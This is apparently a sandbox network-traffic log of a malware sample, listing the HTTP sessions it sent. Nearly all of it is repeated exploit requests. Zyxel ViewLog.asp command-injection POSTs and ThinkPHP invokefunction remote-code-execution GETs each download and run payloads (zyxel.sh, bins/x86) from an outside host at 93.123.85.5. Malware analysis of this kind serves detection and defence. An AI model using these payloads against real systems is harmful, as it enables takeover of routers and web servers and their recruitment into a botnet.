                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:29.409915924 CET18520OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:31.393652916 CET18763OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:35.393222094 CET19273OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:43.329256058 CET20231OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:59.198067904 CET20694OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:31.193742037 CET20716OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              947192.168.2.235608694.187.96.1318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:28.430984020 CET18403OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              94895.9.224.2218080192.168.2.2353616
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:28.515613079 CET18404INHTTP/1.1 400 Bad Request
                                                              Server: micro_httpd
                                                              Cache-Control: no-cache
                                                              Date: Mon, 13 Nov 2023 23:20:28 GMT
                                                              Content-Type: text/html
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              949192.168.2.235864488.150.159.5480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:29.973467112 CET18618OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:30.263489008 CET18638INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              95192.168.2.235448894.120.223.548080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.143798113 CET3059OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              950192.168.2.235602888.99.84.4680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:29.989384890 CET18619OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:30.295705080 CET18639INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.10.3
                                                              Date: Mon, 13 Nov 2023 21:20:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 173
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              951192.168.2.234573888.84.1.22080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:29.996551991 CET18620OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:30.316015005 CET18640INHTTP/1.0 302 Moved Temporarily
                                                              Content-Security-Policy: img-src * data: blob:;base-uri 'self';worker-src 'self' blob:;manifest-src 'self';frame-src 'self' data:
                                                              Referrer-Policy: same-origin
                                                              Strict-Transport-Security: max-age=2592000
                                                              X-Frame-Options: sameorigin
                                                              X-XSS-Protection: 1
                                                              Date: Mon, 13 Nov 2023 21:20:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 0
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              952192.168.2.233514088.255.225.9480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:30.021249056 CET18621OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:30.359467030 CET18641INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:30 GMT
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'self'
                                                              X-XSS-Protection: 1; mode=block
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              953192.168.2.233355488.255.201.2580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:30.028346062 CET18622OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              954192.168.2.234054895.163.16.3280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:30.360706091 CET18642OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:30.699934959 CET18668INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.10.2
                                                              Date: Mon, 13 Nov 2023 21:20:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 173
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              955192.168.2.233763231.136.240.1118080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.134674072 CET18756OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.161526918 CET18891OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.177274942 CET19130OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:38.208729982 CET19637OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:46.399646997 CET20530OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:02.525723934 CET20698OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              956192.168.2.234508231.136.112.358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.144675016 CET18757OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.369484901 CET19140OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.512398958 CET19890OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:52.542877913 CET20680OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:16.859627008 CET20710OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              957192.168.2.234579431.136.208.1478080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.145340919 CET18758OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
